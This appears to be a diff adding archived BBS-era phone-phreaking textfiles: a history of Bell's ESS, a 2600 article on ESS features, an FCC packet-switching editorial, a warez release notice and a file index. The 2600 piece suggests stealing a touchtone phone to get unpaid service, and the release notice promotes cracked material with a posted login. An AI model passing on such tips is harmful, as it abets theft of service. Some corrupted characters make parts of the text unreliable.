you can reach us, The Mortician at Sadistic Torment (818)XxX-XXxX and The
Villain at Dark Society (408)NOT-4YOU.
. . . ^
`____ + ________ __ ____ _|\ _ _ ______ __ _|\ ___
\ \ /.(__ __). | # /. // | \ \| (__ __)_ \/ | \/ /
|\/: \/ | |/ \/ | | / |_// | \ : \/ \ _/ / | \ / +
| | \ _ \\ / _ \ / | _\ : / . /\ / \ \ : /'---.
|_____/_| /_\/\__| / \___ |_\___/__| /._\/__/\ \___/____/
|/ |/ \| |/ \__/NomaD93'
: v . : ~
. '
+82
View File
@@ -0,0 +1,82 @@
/-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
! ESS History !
! !
! Courtesy of: !
! !
! The Lost City of Atlantis !
! !
! <215>-<844>-<8836> !
! !
! 35 MB - 2400 BAUD - CLOCK !
! !
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/
OF ALL THE NEW 1960S WONDERS OF TELEPHONE TECHNOLOGY - SATELITES,ULTRA
MODERN TRAFFIC SERVICE POSITIONS (TSPS) FOR OPERATORS, THE PICTUREPHONE, AND
SO ON - THE ONE THAT GAVE BELL LABS THE MOST TROUBLE, AND UNEXPECTEDLY BECAME
THE GREATEST DEVELOPMENT EFFORT IN BELL SYSTEM'S HISTORY, WAS THE PERFECTION OF
AN ELECTRONIC SWITCHING SYSTEM, OR ESS.
IT MAY BE RECALLED THAT SUCH A SYSTEM WAS THE SPECIFIC END IN VIEW WHEN THE
PROJECT THAT HAD CULMINATED IN THE INVENTION OF THE TRANSISTOR HAD BEEN
LAUNCHED BACK IN THE 1930S. AFTER SUCCESSFUL ACCOMPLISHMENT OF THAT PLANNED
MIRACLE IN 1947-48, FURTHER DELAYS WERE BROUGHT ABOUT BY FINANCIAL STRINGENCY
AND THE NEED FOR FURTHER DEVELOPMENT OF THE TRANSISTOR ITSELF. IN THE EARLY
1950S, A LABS TEAM BEGAN SERIOUS WORK ON ELECTRONIC SWITHCING. AS EARLY AS
1955, WESTERN ELECTRIC BECAME INVOLVED WHEN FIVE ENGINEERS FROM THE HAWTHORNE
WORKS WERE ASSIGNED TO COLLABORATE WITH THE LABS ON THE PROJECT. THE PRESIDENT
OF AT&T IN 1956, WROTE CONFIDENTLY, "AT BELL LABS, DEVELOPEMENT OF THE NEW
ELECTRONIC SWITCHING SYSTEM IS GOING FULL SPEED AHEAD. WE ARE SURE THIS WILL
LEAD TO MANY IMPROVEMENTS IN SERVICE AND ALSO TO GREATER EFFICIENCY. THE FIRST
SERVICE TRIAL WILL START IN MORRIS, ILL., IN 1959." SHORTLY THEREAFTER, KAPPEL
SAID THAT THE COST OF THE WHOLE PROJECT WOULD PROBABLY BE $45 MILLION.
BUT IT GRADUALLY BECAME APPARENT THAT THE DEVELOPEMENT OF A COMMERCIALLY
USABLE ELECTRONIC SWITCHING SYSTEM -IN EFFECT, A COMPUTERIZED TELEPHONE
EXCHANGE - PRESENTED VASTLY GREATER TECHNICAL PROBLEMS THAN HAD BEEN
ANTICIPATED, AND THAT, ACCORDINGLY, BELL LABS HAD VASTLY UNDERESTIMATED BOTH
THE TIME AND THE INVESTMENT NEEDED TO DO THE JOB. THE YEAR 1959 PASSED
WITHOUT THE PROMISED FIRST TRIAL AT MORRIS, ILLINOIS; IT WAS FINALLY MADE
IN NOVEMBER 1960, AND QUICKLY SHOWED HOW MUCH MORE WORK REMAINED TO BE DONE.
AS TIME DRAGGED ON AND COSTS MOUNTED, THERE WAS A CONCERN AT AT&T AND SOMETHING
APPROACHING PANIC AT BELL LABS. BUT THE PROJECT HAD TO GO FORWARD; BY THIS TIME
THE INVESTMENT WAS TOO GREAT TO BE SACRIFICED, AND IN ANY CASE, FORWARD
PROJECTIONS OF INCREASED DEMAND FOR TELEPHONE SERVICE INDICATED THAT WITHIN A
FEW YEARS A TIME WOULD COME WHEN, WITHOUT THE QUANTUM LEAP IN SPEED AND
FLEXIBILITY THAT AN ELECTRONIC SWITCHING WOULD PROVIDE, THE NATIONAL NETWORK
WOULD BE UNABLE TO MEET THE DEMAND. IN NOVEMBER 1963, AN ALL-ELECTRONIC
SWITCHING SYSTEM WENT INTO USE AT THE BROWN ENGINEERING COMPANY AT COCOA BEACH,
FLORIDA. BUT THIS WAS A SMALL INSTALLATION, ESSENTIALLY ANOTHER TEST
INSTALLATION, SERVING ONLY A SINGLE COMPANY. KAPPEL'S TONE ON THE SUBJECT IN
THE 1964 ANNUAL REPORT WAS, FOR HIM, AN ALMOST APOLOGETIC:
"ELECTRONIC SWITCHING EQUIPMENT MUST BE MANUFACTURED IN VOLUME TO UNPRECEDENTED
STANDARDS OF RELIABILITY.... TO TURN OUT THE EQUIPMENT ECONOMICALLY AND WITH
GOOD SPEED, MASS PRODUCTION METHODS MUST BE DEVELOPED; BUT, AT THE SAME TIME,
THERE CAN BE NO LOSS OF PRECISION..."
ANOTHER YEAR AND MILLIONS OF DOLLARS LATER, ON MAY 30, 1965, THE FIRST
COMMERCIAL ELECTRIC CENTERAL OFFICE WAS PUT INTO SERVICE AT SUCCASUNNA,
NEW JERSEY.
EVEN AT SUCCASUNNA, ONLY 200 OF THE TOWN'S 4,300 SUBSCRIBERS INITIALLY HAD
THE BENEFIT OF ELECTRONIC SWITCHING'S ADDED SPEED AND ADDITIONAL SERVICES,
SUCH AS PROVISION FOR THREE PARTY CONVERSATIONS AND AUTOMATIC TRANSFER OF
INCOMING CALLS. BUT AFTER THAT, ESS WAS ON ITS WAY. IN JANUARY 1966, THE SECOND
COMMERCIAL INSTALLATION, THIS ONE SERVING 2,900 TELEPHONES, WENT INTO SERVICE
IN CHASE, MARYLAND. BY THE END OF 1967 THERE WERE ADDITIONAL ESS OFFICES IN
CALIFORNIA, CONNECTICUT,MINNESOTA, GEORGIA, NEW YORK, FLORIDA,AND PENNSYLVANIA;
BY THE END OF 1970 THERE WERE 120 OFFICES SERVING 1.8 MILLION CUSTOMERS; AND BY
1974 THERE WERE 475 OFFICES SERVING 5.6 MILLION CUSTOMERS.
THE DIFFERENCE BETWEEN CONVENTIONAL SWITCHING AND ELECTRONIC SWITCHING IS
THE DIFFERENCE BETWEEN "HARDWARE" AND "SOFTWARE"; IN THE FORMER CASE,
MAINTENENCE IS DONE ON THE SPOT, WITH SCREWDRIVER AND PLIERS, WHILE IN THE CASE
OF ELECTRONIC SWITCHING, IT CAN BE DONE REMOTELY, BY COMPUTER, FROM A CENTERAL
POINT, MAKING IT POSSIBLE TO HAVE ONLY ONE OR TWO TECHNICIANS ON DUTY AT A TIME
AT EACH SWITCHING CENTER.
THE DEVELOPMENT PROGRAM, WHEN THE FINAL FIGURES WERE ADDED UP, WAS FOUND TO
HAVE REQUIRED A STAGGERING FOUR THOUSAND MAN-YEARS OF WORK AT BELL LABS AND TO
HAVE COST NOT $45 MILLION BUT $500 MILLION!

+129
View File
@@ -0,0 +1,129 @@
File: ESS ADVANTAGES
Read 15 times
*******************************************************************************
* *
* Electronic Switching Advances *
* [2600 -- June 1984] *
* *
*******************************************************************************
Despite Obvious Drawbacks, ESS has quite a few nice features
Although most phreaks tend to look upon Electronic Switching Systems with
loathing and dread, they are admittedly fascinating animals to study. The
smooth sophistication of an ESS office, small machines purring away in contrast
to the deafening din of step or crossbar offices, the conspicuous lack of
relays, the presence of software, the calm, controlled, atmosphere.
Horrible, isn't it? Yes, quite, but still anyone who claims to be
interested in phones must learn as much as possible about ESS. So this is a
rundown of some of the interesting things that ESS can do.
Here are a few that can be done in an ess office with individual lines that
are very difficult to arrange in crossbar types (the phone company likes to
refer to these as "classes of treatment"): *Line fixed for OUTGOING calls only.
Incoming calls are thrown to an intercept operator or recording. * Line fixed
for INCOMING calls only. Battery but no dial tone if reciver is lifted on
phone. * Line fixed for outgoing LOCAL calls only. Attempts to call the
operator rejected, as are calls with zero or one as the first digit. * Line
fixed for outgoing LONG DISTANCE only. Zero or one must be the first digit
dialed. * Line fixed for COLLECT calling only. Paid calls rejected, as are 3rd
number or credit card billings. (Used in prisons, jails, and other controlled
situations.) On these, zero is the only acceptable first digit to dial. * Line
fixed for OUTGOING CALLS REQUIRE I.D. (what used to be a "Q" number in manual
handling situations) Dial your call and enter a 4-6 digit personal code.
(Large companies make use of this to keep track of their employees' calls.)
It's said that there are about FIFTY classes of treatment, with class 1
being totally unrestricted (i.e. a "normal" line). As the numbers progress the
types of specialties change. About 20 "classes" are available, the remaining
30 or so are merely various combinations of the first 20 (outgoing calls only
and no long distance calls allowed, etc.). Around 85 percent of the phone
lines are just you average normal arrangement -- the other 15 percent are very
esoteric arrangements for super-large companies, institutions, government, etc.
Some other classes of treatment that are no problem for ESS to arrange are:
* Decline to accept operator assisted calls. The operator is unable to
intercept the line to test for busy or to interrupt in case of an emergency.
This feature shows up a lot on modem lines, since as many have found out, and
operator cutting in on data transmission will frequently wind up inadvertently
disconnecting the modem. * Hotel/motel service. A guest dials his/her calls
normalling, but TSPS will come on the line to take the room number or credit
card number without having to dial zero plus. TSPS sends the charges on "paid"
calls back to the hotel via a private line to either a Teletype machine or
billing equipment on the hotel premises. * Automatic reverse charges
accepted. This is your "800" service. Under ESS, it's possible to simply
take an ordinary line (a regular seven digit phone number) and assign an "800"
billing code to it. * Coin Service. This is your traditional "pay phone"
but in a new arrangement. Instead of a coin hitting a level which makes the
tip go to ground for a half second (ground start line), the ESS gives "dial
tone first" and instead of the five cent "ding" and the ten cent "ding ding"
and the twenty five cent "dong" as the coins are deposited, the coins being
deposited make certain frequencies on the line. ESS is told from a phone in
this "class of treatment" to expect these frequencies, etc.
The Touchtone Problem
As most phreaks already know, if a central office is set up for touchtone
service, then every line is set up for same. All one has to do to obtain
touchtone service is liberate a touchtone phone someplace. If the tones don't
sound when they're pressed, ehten the tip and ring are most likely reversed.
Change the position of the red/green (yellow/black) wires and the problem
should stop. But in ESS offices, you can forget it!!
In an ESS office, when you lift the receiver to make a call, you are
extended one of two types of line selectors. The one is for customers who have
paid for touchtone service. The other is for customers who are listed as
having rotary service. Oddly enough, when you reverse the tip/ring, you won't
gt the tones -- place them properly and you will get the tones -- but --
touchtones won't cut the dial tone in an ESS office unless you've paid for it!
This feature always causes huge problems whenever an office is cut over to
ESS. For various reasons, the phone company's outside plant records are
usually a complete shambles. They tend to keep very poor records about just
what is on the subscribers' premises. So what usually happens is thsi: a big
cpany that has their own centrex line opens it doors on Monday morning (most
ESS cut-overs take place on Sunday mornings to lessen the effect of any
interruption in service) and find that half of its touchtone phones don't work!
The phone companies records didn't say to set up those particular lines with
touchtone! Everyone has fun.
Let's Be Fair
For dedicated phreaks, ESS poses a number of serious problems. But, at the
same time, and awful lot of new features (i.e. toys) are making their way in
our direction, thanks to ESS. The increased ease in call supervision is one
feature you don't hear much about form the phone company and one that many of
us would prefer to do without. But there are these "good" things that the
telco uses as a selling point in ESS -- how beneficial these are to you, versus
the obvious disadvantages, you'll have to decide (even though it won't change a
thing).
* Call Forwarding: Forward incoming calls to whatever phone you want, local
or long distance. * Call Waiting: A tone comes on the line to let you know
that another call is trying to reach you while you're using the phone. * Three
Way Calling: Use the switchook to hold one party while bringing a third party
on lin. * Consulation Calling: Like three way, but you converrse privately
with a third person, hang up and get the first one back who had been waiting on
hold. * Speed Calling: Allows calls anywhere in the U.S. or Canada by dialing
just one digit and the star sign. * Store and Forward: If you can't reach
your party, you can dictate a voice message to the ESS computer. Tell the
computer to try every fifteen minutes until the party answers, then deliver
your recorded message to him. * Answering Service: Like a phone answering
machine, but it is in the computer! Dial a special code, dictate your
"answering service" message and hang up. If you don't answer after a set
number of rings, the computer will play your recording and take a message from
the caller!
Phone compnaies all over are finding that these "enhanced features" are big
sellers. In future issues, we'll discuss some of the bugs that have been found
in these features, and in ESS systems in general.
Sophisticated as it may seem, ESS is by no means perfect. <>
Courtesy of BIOC Agent 003 & Sherwood Forest ][ -- (914) 359-1517
-----End of File
Call The Works BBS - 1600+ Textfiles! - [914]/238-8195 - 300/1200 - Always Open
+213
View File
@@ -0,0 +1,213 @@
The FCC is considering a ruling which may threaten low-cost modem access to
many on-line services, perhaps including Arpa/Milnet TACs and Usenet Unix
systems. Here are the details from a copy of a file just uploaded to my Remote
CP/M system.
--Keith Petersen
The FCC is considering reregulating the packet-switching networks like Telenet,
Tymnet, Compuserve, The Source and PC Pursuit. This could result in additional
costs to the user. This is excerpted from Infomat magazine which is available
for downloading.
COMPUTER AND SOFTWARE NEWS -- PART 1
by Tim ElmeR
FREE LOCAL ACCESS TO PACKET SWITCHING NETWORKS MAY BE ELIMINATED
------------------------------------
(BPS) -- The Federal Communications Commission (FCC) will vote on a proposal
to reregulate packet switching networks that, if approved, would eliminate
free local telephone access to those networks.
"If this occurs, it might eventually double or triple the costs to those
using packet switching networks to access commercial on-line databases and
information services and triple or quadruple the costs to those using
Telenet's PC Pursuit," said Philip M. Walker, vice president and regulatory
counsel for Telenet Communications Corp.
Predictably, the initiative to reregulate packet switching networks comes
primarily from the Bell Operating Companies (BOCs) and secondarily from AT&T.
These companies provide local telephone service to vast majority of telephone
customers throughout the U.S. and will benefit the most from FCC reregulation
of the packet switching networks.
Under current FCC rules formulated in 1980 in the FCC's Second Computer
Inquiry, called Computer II, a distinction is made between "basic services"
and "enhanced services."
"Basic services" are those that don't offer protocol conversion such as local
and long-distance voice telephone services. "Enhanced services" are defined
in an open-ended fashion as computer-based services that are more than a
"basic service," in other words, services such as packet switching networks,
database and on-line type services, and remote computing services that offer
protocol conversion, according to Walker.
Under the 1980 Computer II Inquiry, the FCC ruled that "basic services" would
continue to be regulated as they had always been. However, the FCC also ruled
that "enhanced services" would be deregulated, which opened up the industry to
competition. This resulted in numerous companies entering the packet
switching business, including BOCs, AT&T and at least a dozen others. The
competition resulted in significant price reductions for packet switching
services.
To prevent monopolization of the packet switching industry by the Big Boys
(the BOCs and AT&T), the FCC ruled that they had to keep separate accounting
figures for their "basic services" and for their "enhanced services," and that
they could not use revenues from their lucrative "basic services" to cross-
subsidize their "enhanced service" packet switching networks.
The FCC also ruled that if the BOCs and AT&T used their "basic service"
telephone lines for packet switching services, then they must let their
competitors have access to those lines on the same basis, which would preserve
true competition in the industry.
"Now, under the FCC's Computer Inquiry III, the FCC is asking, should we
redefine protocol conversion services as 'basic services' rather than enhanced
services? Should we redefine all those companies as common carriers? This
would, in effect, subject them not only to federal regulations but, even
worse, to state regulations," Walker said.
The result would eliminate comparable interconnection requirements currently
imposed on BOCs and AT&T, allowing them to cèarge their packet switching
competitors local dial-in fees to access packet switching long-disôance line
networks.
It would also allow BOCs and AT&T to offer their own packet switching
services on a non-compensatory basis and, finally, allow them to cross-
subsidize those services with revenues from their much more lucrative voice
telephone service revenues. In short, it would allow BOCs and AT&T to
monopolize the packet switching industry and probably drive out most
competitors.
"In terms of cost impact," Walker said, "if we had to pay local access
charges, it would cost us about $3.60 an hour at the originating end, for
calls made by users to on-line databases and informatiompuServe and The Source.
"And with PC Pursuit, for which we have out-dial modems, we would have to pay
not only 3.60 per hour access fees at the originating end but also $4.80 at
the terminating end, a total of about $8 or $9. Obviously, to survive, we
would have to add those additional charges to our current fees and pass them
on to our consumers," Walker said.
That would almost certainly spell the end of PC Pursuit, and it would likely
put out of business not only many independent packet switching networks but
also many on-line databases and information services.
FCC approval of chaîges being considered in Computer III, Walker said, "would
really have a major impact on anyonå using a packet switching service to
access online bulletin boards, databases, or information services aimed at the
residential user. They are just going to get creamed if this happens."
Walker said that is was not clear exactly when the FCC would vote on the
proposal, but that it would probably be the latter part of January or early
part of February, 1987. "They are moving very fast on this," he said.
For additional information, be sure to read Alan Bechtold's editorial in this
issue.
Copyright (C) 1986, by BBS PRESS SERVICE, INC.
THE EDITOR SPEAKS
"Low-Cost packet switching Service Threatened"
by Alan R. Bechtold
As described in our lead news story this issue, the FCC is now considering a
major change in the way packet switched phone services are defined. This
change is likely to lead to the demise of many of these services, and to much
higher prices for the use of the few that will eventually remain in business.
[BASIC DESCRIPTION OF PACKET SWITCH DELETED SO ARTICLE WOULD FIT IN MY
BUFFER -elric]
FCC regulations allow AT&T and Bell Operating Companies (BOCs) to engáge in
packet switching netwïrk operations, but they must also maintain completely
separate accounting of their voice and packet switching operations. They must
also offer free local-calling access to their lines to any competitors engaged
in the packet switching service industry.
The above regulations have allowed Telenet and Tymnet, among others, to
operate at a reasonable cost in a competitive atmosphere. This is a case of
regulation of a business actually RESULTING in increased competition and lower
prices to consumers.
As things stand now, you can call any local Telenet or Tymnet access number
and use these services to énexpensively access such onlinå services as
CompuServe, The Source, Delphi, and countless others. In addition, GTE's new
PC PURSUIT service now offers you access, through their Telenet packet
switching service, to literally hundreds of local bulletin boards in cities
all across the country--for a flat charge of $25 per month.
But, the FCC is now being asked to REREGULATE this segment of the
communications industry, eliminating the FCC requirements that AT&T and BOCs
keep separate accounting records of their voice and packet switching services,
and eliminating the stipulation that the BOCs and AT&T must offer their
competitoró in the packet switching businåss free access to their local
telephone connection lines.
The idea is patently ridiculous.
Mark Fowler, Chairman of the FCC, has been hailed by the press as a "fair-
market zealot." The chances are very good that he views this proposed
reregulation as the magic road to increased competition and fairer pricing for
consumers.
Unofficially, the word is out that the FCC advisory committee now considering
this matter is indeed leaning in favor of the proposed reregulation of the
packet switching industry. If the committee recommends these changes, it's
likely that a majority of the five voting members on the Federal
Communications Commission will vote in favor of the changes.
I have talked to sources within the industry who say it is the BOCs who are
pushing VERY HARD for this reregulation, because they want to get into the
packet switching service business in a big way, and they would like to rid
themselves of needless competition on their way to success.
What's that? RID themselves of competition? But--the proposed reregulation
is supposed to FOSTER competition! Why would a group of companies (BOCs)
hoping to eliminate their competition PUSH for this reregulation? I hope the
answer to THAT question is entirely clear.re we have an industry that is current
ly populated with plenty of
competition. Prices are already reasonable. Reregulation of the packet
switching service industry will IMMEDIATELY give giant corporations the upper
hand, and will allow them to cut off free access to their local access phone
lines to their competitors, namely Telenet and Tymnet and other similar
services that now offer you high-quality service, in a competitive
marketplace, at reasonable prices.
The proposed reregulation, however, would force all packet switching services
to compete with the BOCs and AT&T, companies that would be able to use the
enormous profits they earn with their voice telephone services to cross-
subsidize their packet switching services and offer them on a non-compensatory
basis, at least until their competitors are eliminated. When that happens,
they are then sure to jack up their fees to any level they want.
It would also force their packet switching competitors to pay access fees for
connection to local phone lines. The access fees alone could add as much as
$4.00 per hour to the fees packet switching companies would be forced to pass
on to their customers. This will be added to your hourly connect-time charges
for accessing ALL online databases through these services.
The proposed reregulation could very well spell the death of PC PURSUIT.
Because GTE also uses dial-out modems at the other end of their Telenet
connections for PC PURSUIT service, the company would be forced to pay an
hourly charge at BOTH ends of the phone line--totaling up to $8 or $9 per
hour. These fees would have to be added to the flat $25 per month that GTE
now charges for access to PC-PURSUIT. It would simply make the final cost to
PC-PURSUIT customers too high for the service to remain practical and
affordable.
So--this is ONE TIME you MUST use your word processor to produce some letters
opposing this proposed reregulation! Write to:
Honorable Mark Fowler
Chairman of the Federal Communications Commission
Washington D.C. 20554
Refer to Computer Inquiry III in your letters. State clearly, in your own
words, that competitive packet switching services should not be reregulated or
subjected to carrier access charges, and then explain why. Hurry, they will
be deciding this in láte Jan., earìy feb.
+87
View File
@@ -0,0 +1,87 @@
H I G H V O L T A G E
ÚÄÄ úúú
ÚijÄÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͸ ú
³ ³úúÄÄÄÄÄÄÍÍÍÍÍÍÍÍÆP R E S E N T SµÍÍÍÍÍÍÍÍÄÄÄÄÄÄúú³ ú
ú ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ú
ú ³ Signaling System 7 ³ ³
ú ÔÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄijÄÙ
úúúÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ R E L E A S E N O T E SÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Company : Bellcore Tec Cracked By:
Serial # : Supplier! : WM
Release Date : 7/31/94 How good is it? :Good Info!
Disks : 2 Packager : War Master
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Brief Description ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
This is a tutorial of a new switching system incorporated
by GTE and AT&T... Maybe a new way to call out ??
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ú
ÚijÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ú
ú ³M E M B E R SÄÄÄÄ´ ú
ú ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄijÄÙ
ú
PhoneStud Killerette Wayward
Spread'n Team : Annihilator (Courier Coordinator)
Storm Master (Courier Coordinator)
CyberChrist JunkMan The Cool One The Shadow
The Silent Assasin
High Voltage Guys : Nuke Kid Creole Radar/HV Bazza War Master
Amphagory BadMan The Joker Quackers
Ipso Facto Legend Sandstorm Ford Perfect
Bayou Hula White Fox
*** If your group is not giv'in you the support you think you deserve,
CALL HIGH VOLTAGE! We offer FULL support with HV releases PLUS ALL
major releases!
IF YOU ARE INTERESTED in becomming a Member BBS, or Supplier for
HIGH VOLTAGE, PLEASE call *** 404-518-1795 *** and use;
Login = High Voltage
Password = HV94
LEAVE MAIL TO -->> Killerette !!!!!
*** OR Contact Killerette or Phonestud on ANY MAJOR Elite BBS in the USA
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
ÃÄÄÄÄÄÄÄÄÄÄÄÄM E M B E R B B S L I S TÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ Name Number Nodes Sysop ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
R.i.P WHQ HQ (714)000-0000 Sorry Invite ONLY
Road To Noware USA HQ (310)000-0000 4 Legend
Yee Side Canadian HQ (613)000-0000 5 Amphagory
Software Pit Australia HQ +61-000-00000 2 Bazza
The Hemispheres Courier HQ (404)000-0000 6 Radar/HV
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
White Sands -HV- BBS (000)000-0000 2 Sandstorm
Whiplash -HV- BBS (206)000-0000 2 Kram
Gotham City -HV- BBS (512)000-0000 2 Joker
The City -HV- BBS (813)000-0000 5 War Master
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
Zen Distro BBS (410)000-0000 3 Rox/Sigh
Flatliner Distro BBS (604)000-0000 2 Dr. Death
Nightmare Ministry Distro BBS (203)000-0000 3 Rocky Moto
The Bad Sector Distro BBS (514)000-0000 6 Spirit Hex
Customary HateFish Distro BBS (801)000-0000 2
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
Personal Greets : The Hellion, Butcher, Demented Bendz, FanFan LaTulipe,
Data-Stream, Big Boss, Saito/TRSi, Silus Guardian,
Rizzo, Mr. Morris, MikeySoft, Oyl Patch, Little Will
Iron Force, Spirit Hex
Group Greets : PTG, PE, RiSC, NTA, Nexus, UC, PiL, Legend, LCS
+161
View File
@@ -0,0 +1,161 @@
# SWITCHES
Telephone Switching Systems and Other Phone-Related Hardware
## FILES
=> gemini://informis.land/textfiles/phreak/SWITCHES/1aess.txt [ 8658] ESS1 and 1A Switching Systems, researched and compiled by The Ninja Master
=> gemini://informis.land/textfiles/phreak/SWITCHES/1aessdoc.phk [ 4487] Common 1A ESS Messages
=> gemini://informis.land/textfiles/phreak/SWITCHES/1aessnfo.phk [ 21476] The Tao of 1A ESS, by Dead Kat and Disorder
=> gemini://informis.land/textfiles/phreak/SWITCHES/5ess.onl [ 63272] AT&T 5ESS From Top to Bottom, by Firm G.R.A.S.P.
=> gemini://informis.land/textfiles/phreak/SWITCHES/6_2_01.txt [ 81187] Specifications of Signalling System Number 4
=> gemini://informis.land/textfiles/phreak/SWITCHES/6_2_02.txt [ 108279] Specifications of Signalling System Number 5
=> gemini://informis.land/textfiles/phreak/SWITCHES/6_4_01.txt [ 46979] Specifications of Signalling System Number R1
=> gemini://informis.land/textfiles/phreak/SWITCHES/ais.txt [ 15510] AIS: Automatic Intercept System: The DIAS II System by Computer Consoles Incorporated
=> gemini://informis.land/textfiles/phreak/SWITCHES/analss.txt [ 10522] Analogue Signalling Systems - An overview by NeonDreamer
=> gemini://informis.land/textfiles/phreak/SWITCHES/at&tinfo.txt [ 9205] The Complete Guide to Definity G Series Systems AKA System 75 - 85 by Scott Simpson (June 18, 1992)
=> gemini://informis.land/textfiles/phreak/SWITCHES/autovon.phk [ 4545] Introduction to the Automatic Voice Network (AUTOVON)
=> gemini://informis.land/textfiles/phreak/SWITCHES/autovon.txt [ 18926] A Description and History of the AUTOVON (Automatic Voice Network)
=> gemini://informis.land/textfiles/phreak/SWITCHES/axe10sss.txt [ 12156] The AXE 10 Subscriber Switching Subsystem, by Keltic Phr0st
=> gemini://informis.land/textfiles/phreak/SWITCHES/bbfraud.txt [ 38508] Digital Switching Systems: DMS-100 Family Blue Box Fraud Detection Feature Description (April 24, 1987)
=> gemini://informis.land/textfiles/phreak/SWITCHES/bctj1.01 [ 1875] BellCore Technical Journal: Introduction
=> gemini://informis.land/textfiles/phreak/SWITCHES/bctj1.02 [ 15283] BellCore Technical Journal: Electronic Switching System Faults
=> gemini://informis.land/textfiles/phreak/SWITCHES/bctj1.03 [ 24383] BellCore Technical Journal: Overview of Bellcore Metrocore Network
=> gemini://informis.land/textfiles/phreak/SWITCHES/bctj1.04 [ 7457] BellCore Technical Journal: Ethernet Fields
=> gemini://informis.land/textfiles/phreak/SWITCHES/bctj1.05 [ 33042] BellCore Technical Journal: ISDN C File
=> gemini://informis.land/textfiles/phreak/SWITCHES/bctj1.06 [ 49965] BellCore Technical Journal: The Microwave Image Transimpedance Front-End Amplifier For Optical Receivers
=> gemini://informis.land/textfiles/phreak/SWITCHES/bellcort.1 [ 15287] Electronic Switching System Faults from No 2 ESS Administration and Maintenance Plan, BSTJ Vol 48, 1969
=> gemini://informis.land/textfiles/phreak/SWITCHES/bellres1.txt [ 7257] Bell Research Report (Vol I) by SSWC
=> gemini://informis.land/textfiles/phreak/SWITCHES/bellres2.txt [ 11719] Bell Research Report (Vol II) by SSWC
=> gemini://informis.land/textfiles/phreak/SWITCHES/bellsgnl.phk [ 11307] Basic Signalling, Part #1, by Asmodeus Rex
=> gemini://informis.land/textfiles/phreak/SWITCHES/ccittug1.txt [ 79801] CCITT Underground Informations Part 1
=> gemini://informis.land/textfiles/phreak/SWITCHES/cco.txt [ 2682] Southwestern Bell's Call Control Options (May 14, 1991)
=> gemini://informis.land/textfiles/phreak/SWITCHES/centoff.phk [ 7152] A Look at Central Offices, by Doctor Zerox, David Johns and GJC
=> gemini://informis.land/textfiles/phreak/SWITCHES/centrex.txt [ 12273] Centrex Renaissance: The Technology, by John D. Bray, from Jester Sluggo
=> gemini://informis.land/textfiles/phreak/SWITCHES/centrexr.txt [ 12079] Centrex Renaissance: The Technology (October 1985) typed by Jester Sluggo
=> gemini://informis.land/textfiles/phreak/SWITCHES/chinarol.txt [ 6079] R.O.L.M. Sorcerer XII: The PBX Remote System Control, by The Conflict of CHiNA
=> gemini://informis.land/textfiles/phreak/SWITCHES/class.txt [ 17548] Custom Local Area Signalling Services by The Videosmith Version 1.1 (1994)
